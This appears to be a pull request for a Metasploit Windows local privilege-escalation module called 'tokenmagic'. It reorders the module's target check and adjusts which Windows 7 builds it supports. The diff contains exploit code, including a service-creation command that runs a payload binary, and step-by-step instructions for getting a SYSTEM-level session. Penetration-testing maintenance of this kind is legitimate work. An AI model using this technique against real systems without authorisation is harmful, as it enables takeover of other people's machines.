### PR TITLE
Update check method and move it to earlier in the module

### DIFF
--- a/documentation/modules/exploit/windows/local/tokenmagic.md
+++ b/documentation/modules/exploit/windows/local/tokenmagic.md
@@ -11,9 +11,11 @@ The module exploits the high IL gained from the "token magic" by either starting
 on a known DLL in `system32`.
 
 ### Installation And Setup
-Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7, 8, 8,1 and Windows 10 instances up to 1803. The DLL
+Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
 hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
-versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.
+versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.  The technique
+may work on Windows 7 sp0, but loading powershell appears to crash the session.  You might be able to upload and run
+the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
 
 ## Verification Steps
  1. Start msfconsole

--- a/modules/exploits/windows/local/tokenmagic.rb
+++ b/modules/exploits/windows/local/tokenmagic.rb
@@ -139,6 +139,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
       writable_dir = session.sys.config.getenv('TEMP')
     end
 
+    # Check target
+    validate_active_host
+    validate_payload
+
     if datastore['METHOD'] =~ /DLL/i
       bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
       payload = generate_payload_dll
@@ -155,11 +159,6 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
       # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
       cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
     end
-
-    # Check target
-    print_status('Checking Target')
-    validate_active_host
-    validate_payload
 
     # Upload the payload
     print_status("Uploading payload to #{bin_path}")
@@ -217,11 +216,11 @@ minutes to trigger and recieve a shell.")
     vprint_status("Build Number = #{build_num}")
     if datastore['METHOD'] =~ /service/i
       # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
-      return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
+      return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
     elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
       # DLL method has been tested on Windows 10 (1703 to 1803)
       return Exploit::CheckCode::Appears
-    elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
+    elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
       print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
     end
     Exploit::CheckCode::Safe


### PR DESCRIPTION
It turns out that while this technique should work on Windows 7 SP0, the act of loading our Powershell module seems to crash the targets I'm testing.  Regardless, we should not have loaded the powershell module before executing the `check` method.  That was likely my fault.

No one else has verified this behavior, but I built a second target and it behaved in the exact same manner.  Based on that, I updated the check method, and moved it _before_ the Powershell loading call.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `set method service`
- [x] get a default user meterpreter session on a Windows 7 sp0 target
- [x] `use exploit/windows/local/tokenmagic`
- [x] `set session x`
- [x] `run`
- [x] **Verify** the check method tells you no, and the session remains intact
- [x] `set method dll`
- [x] **Verify** the check method tells you no, and the session remains intact
- [x] get a default user meterpreter session on a Windows 7 sp1 target
- [x] `set method service`
- [x] `run`
- [x] feel victorious about your new, shiny SYSTEM-level session.

@jheysel-r7 